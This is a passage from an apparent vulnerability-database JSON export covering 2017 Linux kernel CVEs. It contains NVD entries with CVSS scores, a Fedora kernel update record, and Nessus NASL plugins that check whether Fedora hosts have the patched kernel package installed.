"CVE-2017-17448", "CVE-2017-17449", "CVE-2017-17450", "CVE-2017-17558", "CVE-2017-17712", "CVE-2017-17741", "CVE-2017-17852", "CVE-2017-17853", "CVE-2017-17854", "CVE-2017-17855", "CVE-2017-17857", "CVE-2017-17862", "CVE-2017-17863", "CVE-2017-17864", "CVE-2017-18232", "CVE-2017-8824", "CVE-2018-1000004", "CVE-2018-1000026", "CVE-2018-10021", "CVE-2018-10322", "CVE-2018-10323", "CVE-2018-1065", "CVE-2018-10840", "CVE-2018-10853", "CVE-2018-1108", 
"CVE-2018-1120", "CVE-2018-11506", "CVE-2018-12232", "CVE-2018-3639", "CVE-2018-5332", "CVE-2018-5333", "CVE-2018-5344", "CVE-2018-5750", "CVE-2018-5803", "CVE-2018-7757", "CVE-2018-7995", "CVE-2018-8043"], "description": "The kernel meta package ", "modified": "2018-06-22T14:12:17", "published": "2018-06-22T14:12:17", "id": "FEDORA:10F7D6255145", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: kernel-4.16.16-200.fc27", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2021-02-02T06:36:39", "description": "The usbnet_generic_cdc_bind function in drivers/net/usb/cdc_ether.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (divide-by-zero error and system crash) or possibly have unspecified other impact via a crafted USB device.", "edition": 6, "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 6.6, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-07T23:29:00", "title": "CVE-2017-16649", "type": "cve", "cwe": ["CWE-369"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16649"], "modified": "2018-11-28T11:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.13.11"], "id": 
"CVE-2017-16649", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16649", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.13.11:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:39", "description": "drivers/net/usb/asix_devices.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted USB device.", "edition": 6, "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 6.6, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-07T23:29:00", "title": "CVE-2017-16647", "type": "cve", "cwe": ["CWE-476"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16647"], "modified": "2018-04-06T01:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.13.11"], "id": "CVE-2017-16647", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16647", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.13.11:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:39", "description": "The qmi_wwan_bind function in drivers/net/usb/qmi_wwan.c in the 
Linux kernel through 4.13.11 allows local users to cause a denial of service (divide-by-zero error and system crash) or possibly have unspecified other impact via a crafted USB device.", "edition": 6, "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 6.6, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-07T23:29:00", "title": "CVE-2017-16650", "type": "cve", "cwe": ["CWE-369"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16650"], "modified": "2018-08-24T10:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.13.11"], "id": "CVE-2017-16650", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16650", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.13.11:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:39", "description": "The hdpvr_probe function in drivers/media/usb/hdpvr/hdpvr-core.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (improper error handling and system crash) or possibly have unspecified other impact via a crafted USB device.", "edition": 6, "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 6.6, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-07T23:29:00", "title": "CVE-2017-16644", "type": "cve", "cwe": ["CWE-388"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16644"], "modified": "2018-08-24T10:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.13.11"], "id": "CVE-2017-16644", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16644", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.13.11:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:40", "description": "The walk_hugetlb_range function in mm/pagewalk.c in the Linux kernel before 4.14.2 mishandles holes in hugetlb ranges, which allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call.", "edition": 19, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, 
"published": "2017-11-27T19:29:00", "title": "CVE-2017-16994", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16994"], "modified": "2018-04-25T01:29:00", "cpe": [], "id": "CVE-2017-16994", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16994", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}], "nessus": [{"lastseen": "2021-01-07T10:15:17", "description": "The 4.13.16 update contains various fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 17, "cvss3": {"score": 6.6, "vector": "AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-01T00:00:00", "title": "Fedora 26 : kernel (2017-f9f3d80442)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16649", "CVE-2017-16994", "CVE-2017-16647", "CVE-2017-16650", "CVE-2017-16643", "CVE-2017-16644"], "modified": "2017-12-01T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-F9F3D80442.NASL", "href": "https://www.tenable.com/plugins/nessus/104943", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 
FEDORA-2017-f9f3d80442.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104943);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-16643\", \"CVE-2017-16644\", \"CVE-2017-16647\", \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16994\");\n script_xref(name:\"FEDORA\", value:\"2017-f9f3d80442\");\n\n script_name(english:\"Fedora 26 : kernel (2017-f9f3d80442)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.13.16 update contains various fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-f9f3d80442\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-16643\", \"CVE-2017-16644\", \"CVE-2017-16647\", \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16994\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2017-f9f3d80442\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"kernel-4.13.16-200.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:11:57", "description": "The 4.13.16 update contains various fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 17, "cvss3": {"score": 6.6, "vector": "AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-01-15T00:00:00", "title": "Fedora 27 : kernel (2017-92a0ae09aa)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16649", "CVE-2017-16994", "CVE-2017-16647", "CVE-2017-16650", "CVE-2017-16643", "CVE-2017-16644"], "modified": "2018-01-15T00:00:00", 
"cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2017-92A0AE09AA.NASL", "href": "https://www.tenable.com/plugins/nessus/105930", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-92a0ae09aa.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105930);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-16643\", \"CVE-2017-16644\", \"CVE-2017-16647\", \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16994\");\n script_xref(name:\"FEDORA\", value:\"2017-92a0ae09aa\");\n\n script_name(english:\"Fedora 27 : kernel (2017-92a0ae09aa)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.13.16 update contains various fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-92a0ae09aa\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-16643\", \"CVE-2017-16644\", \"CVE-2017-16647\", \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16994\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2017-92a0ae09aa\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"kernel-4.13.16-300.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:11:53", "description": "The 4.13.16 update contains various fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 17, "cvss3": {"score": 6.6, "vector": "AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-04T00:00:00", "title": "Fedora 25 : kernel (2017-905bb449bc)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16649", "CVE-2017-16994", "CVE-2017-16647", "CVE-2017-16650", "CVE-2017-16643", "CVE-2017-16644"], "modified": "2017-12-04T00:00:00", 
"cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-905BB449BC.NASL", "href": "https://www.tenable.com/plugins/nessus/104979", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-905bb449bc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104979);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-16643\", \"CVE-2017-16644\", \"CVE-2017-16647\", \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16994\");\n script_xref(name:\"FEDORA\", value:\"2017-905bb449bc\");\n\n script_name(english:\"Fedora 25 : kernel (2017-905bb449bc)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.13.16 update contains various fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-905bb449bc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-16643\", \"CVE-2017-16644\", \"CVE-2017-16647\", \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16994\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2017-905bb449bc\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"kernel-4.13.16-100.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T08:52:47", "description": "According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - A flaw was found in the processing of incoming L2CAP\n bluetooth commands. 
Uninitialized stack variables can\n be sent to an attacker leaking data in kernel address\n space.(CVE-2017-1000410)\n\n - The qmi_wwan_bind function in\n drivers/net/usb/qmi_wwan.c in the Linux kernel through\n 4.13.11 allows local users to cause a denial of service\n (divide-by-zero error and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16650)\n\n - The usbnet_generic_cdc_bind function in\n drivers/net/usb/cdc_ether.c in the Linux kernel through\n 4.13.11 allows local users to cause a denial of service\n (divide-by-zero error and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16649)\n\n - The ims_pcu_get_cdc_union_desc function in\n drivers/input/misc/ims-pcu.c in the Linux kernel\n through 4.13.11 allows local users to cause a denial of\n service (ims_pcu_parse_cdc_data out-of-bounds read and\n system crash) or possibly have unspecified other impact\n via a crafted USB device.(CVE-2017-16645)\n\n - The hdpvr_probe function in\n drivers/media/usb/hdpvr/hdpvr-core.c in the Linux\n kernel through 4.13.11 allows local users to cause a\n denial of service (improper error handling and system\n crash) or possibly have unspecified other impact via a\n crafted USB device.(CVE-2017-16644)\n\n - The parse_hid_report_descriptor function in\n drivers/input/tablet/gtco.c in the Linux kernel before\n 4.13.11 allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB\n device.(CVE-2017-16643)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
